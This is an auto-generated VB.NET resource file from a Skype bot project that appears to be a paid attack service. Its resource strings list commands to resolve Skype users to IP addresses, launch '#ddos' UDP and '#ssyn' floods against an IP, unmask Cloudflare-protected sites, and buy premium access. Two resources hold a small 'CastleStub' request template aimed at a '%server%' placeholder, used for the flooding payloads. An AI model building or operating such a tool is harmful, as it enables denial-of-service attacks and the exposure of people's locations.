'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.34014
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("yolo.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to =========About=========
        '''This bot is made by Snowfall, the maker of Vision Products and Toast Dox Tool!
        '''If you got any questions or any reports, then you have to contact Snowfall.
        '''
        '''Thank you for using my bot!
        '''=======================.
        '''</summary>
        Friend ReadOnly Property about() As String
            Get
                Return ResourceManager.GetString("about", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to ==========Admin Help==========
        '''The current available admin commands are:
        '''#online - Sets the bots status to online.
        '''#away - Sets the bots status to away.
        '''#busy - Sets the bots status to do not disturb.
        '''#hide - Sets the bots status to invisible.
        '''#setpremium {username} - Sets a user to premium.
        '''#delpremium {username} - Removes a user from premium.
        '''#setadmin {username} - Sets a user to admin.
        '''#deladmin {username} - Removes a user from admin.
        '''#block - Block the person you send this to.
        '''#broadcast -m - [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property adminhelp() As String
            Get
                Return ResourceManager.GetString("adminhelp", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to ==========Commands==========
        '''#resolve {username} - Resolve a skype name to reveal IP.
        '''#trace {IP / Host} - Trace a website or IP.
        '''#ddos {IP} {time} - Attack an IP with a powerful UDP attack.
        '''#about - Gives you a little info about the bot.
        '''#ssyn {IP} {time} - Attack an IP with a nice and powerful SSYN attack.
        '''#purchase - Purchase premium.
        '''#blacklist {username} - Request blacklisting.
        '''#cfresolve {host} - Resolve a cloudflare protected site.
        '''#joke - Shows a joke.
        '''#ip2skype - Check if an IP is connect [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property commands() As String
            Get
                Return ResourceManager.GetString("commands", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Imports System.Windows.Forms
        '''Imports System.Net
        '''Module CastleStub
        '''    Sub Main()
        '''	   on error resume next
        '''        Dim request As HttpWebRequest = HttpWebRequest.Create(&quot;%server%&quot;)
        '''        Dim response As HttpWebResponse = request.GetResponse
        '''    End Sub
        '''
        '''End Module.
        '''</summary>
        Friend ReadOnly Property ddos() As String
            Get
                Return ResourceManager.GetString("ddos", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Imports System.Windows.Forms
        '''Imports System.Net
        '''Module CastleStub
        '''    Sub Main()
        '''	   on error resume next
        '''        Dim request As HttpWebRequest = HttpWebRequest.Create(&quot;%server%&quot;)
        '''        Dim response As HttpWebResponse = request.GetResponse
        '''    End Sub
        '''
        '''End Module.
        '''</summary>
        Friend ReadOnly Property ssyn() As String
            Get
                Return ResourceManager.GetString("ssyn", resourceCulture)
            End Get
        End Property
    End Module
End Namespace
